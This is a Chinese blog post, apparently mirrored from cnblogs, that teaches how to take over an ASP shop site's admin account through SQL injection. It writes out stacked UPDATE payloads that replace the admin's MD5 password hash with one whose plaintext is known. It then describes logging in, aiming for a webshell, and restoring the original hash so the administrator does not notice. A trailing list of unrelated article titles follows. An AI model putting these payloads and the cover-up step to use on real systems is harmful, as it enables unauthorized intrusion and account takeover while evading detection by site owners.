zoukankan      html  css  js  c++  java
  • sql注入更改能破解的md5

    很多时候我们找到了注入点,管理员用户名也猜到了,可就是破解不了Md5密文。很多人到这里都会选择放弃。我们知道sql注入可以进行字段查询,既然可以查询,那么它同样也可以进行字段更新。我们只要把管理员密码的Md5值替换为我们自己的可破解的Md5即可。

           注入点已经找到:http://xxx.com/book.asp?id=1996

           我刚已经用NB检测过了。可以看到,存在表段 shop_admin。

           密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c

           注射的语句如下:

           ;update shop_admin set password=’新MD5加密密码’ where

           password=’d4716077c2ba075c’–

           比如,我需要把zhuyaod的密码改成wmmhacker,我们首先要先获得wmmhacker通过MD5加密后的十二

           位密码

           这里用明小子的工具就能转换了。wmmhacker – f8dc763194f29433

           ;update shop_admin set password=’f8dc763194f29433′ where

           password=’d4716077c2ba075c’–

           我们来测试。看见了,页面没有返回错误,表示成功了。

           现在我们对shop_admin表段下的密码做重新解猜。

           [adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433

           大家对比一下,已经改变了。现在我们可以登陆了。

           进来了。呵呵。就到这里了吧。值得提一句的是,我们进了后台,然后想办法拿到WEBSHELL。

           接着,别忘了把管理员密码还原。不然他会发现滴!

           ;update shop_admin set password=’d4716077c2ba075c’ where

           password=’f8dc763194f29433′–

    之前朋友问我,如何在解不出MD5值下进入后台,这个文章是个不错的思路.

  • 相关阅读:
    codevs 3049 舞蹈家怀特先生
    洛谷P2530 [SHOI2001]化工厂装箱员
    洛谷P2736 “破锣摇滚”乐队 Raucous Rockers
    Phalanx
    Treats for the Cows
    Very Simple Problem
    Alice and Bob
    FatMouse and Cheese
    Tickets
    Piggy-Bank
  • 原文地址:https://www.cnblogs.com/kanghongsec/p/4854104.html
Copyright © 2011-2022 走看看